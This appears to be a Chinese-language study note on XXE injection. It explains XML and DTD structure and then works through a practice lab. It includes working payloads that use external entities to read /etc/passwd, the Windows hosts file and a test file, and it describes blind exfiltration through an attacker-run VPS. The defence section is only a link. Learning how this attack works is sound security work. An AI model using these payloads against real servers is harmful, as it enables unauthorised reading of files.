题记
昨天把很久之前看的XXE、SSRF、../../目录遍历什么的漏洞详细复习了一遍,又读出来不少新东西。来不及了,我们不能把时间浪费在迷茫上。
这次先整理XXE。XXE,外部传入的XML代码。
本来整理一半放弃了,我觉得人家写的挺好的,自己也理解了,看人家的就行,后来又觉得自己重新整一遍才好,过一遍脑子。
XXE介绍
"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。
XXE原理
第一部分:XML声明部分
<?xml version="1.0"?>
第二部分:文档类型定义 DTD
<!DOCTYPE note[ <!--定义此文档是note类型的文档--> <!ENTITY entity-name SYSTEM "URI/URL"> <!--外部实体声明--> ]]]>
第三部分:文档元素
<note> <to>Dave</to> <from>Tom</from> <head>Reminder</head> <body>You are a good man</body> </note>
DTD(Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部。
DTD现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
内部申明DTD格式
<!DOCTYPE 根元素 [元素申明]>
外部引用DTD格式
<!DOCTYPE 根元素 SYSTEM "外部DTD的URI">
引用公共DTD格式
<!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">
外部实体引用 Payload
<?xml version="1.0"?> <!DOCTYPE ANY[ <!ENTITY f SYSTEM "file:///etc/passwd"> ]> <x>&f;</x>
外部引用可以支持http,file,ftp等协议。
如果一个接口支持接收xml数据,且没有对xml数据做任何安全上的措施,就可能导致XXE漏洞。
simplexml_load_string()
函数转换形式良好的XML 字符串为 SimpleXMLElement 对象。
在PHP 里面解析 xml 用的是 libxml, 其在 2.9.0 的版本中 默认是禁止解析 xml 外部实体内容的。
XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致攻击者可以构造一个恶意的XML。
Xml提交的时候页面可直接提交,数据包中需要进行编码处理。
XXE利用方法
1、有回显的
直接在请求包post利用即可。
2、无回显的
申请一个vps,vps定义DTD,利用XXE引入外部DTD,vps监听端口获取内容。
XXE查找方法
1、service为xfire的
2、明显的xml为内容输入点的。
3、以json格式的request。
XXE靶场利用
1、进入靶场,随便输入,回显为
2、构造一个payload,
<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hack "chongchongchong"> ]> <name>hack</name>
回显为
3、构造一个恶意的payload,通过外部实体引用从而去获取后台服务器的本地文件信息
(注:外部引用可以支持http,file,ftp等协议。)
payload <?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://Windows/System32/drivers/etc/hosts"> <!--要根据后台服务器的系统,输入正确的文件路径--> ]> <x>&f;</x>
回显为
4、我们可以在C盘创建一个txt文件
路径为
C:XXE.txt
5、构造payload
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://XXE.txt"> ]> <name>&f;</name>
XXE防御方式
参考链接
http://cnblogs.com/sunny11/p/13617128.html#_label1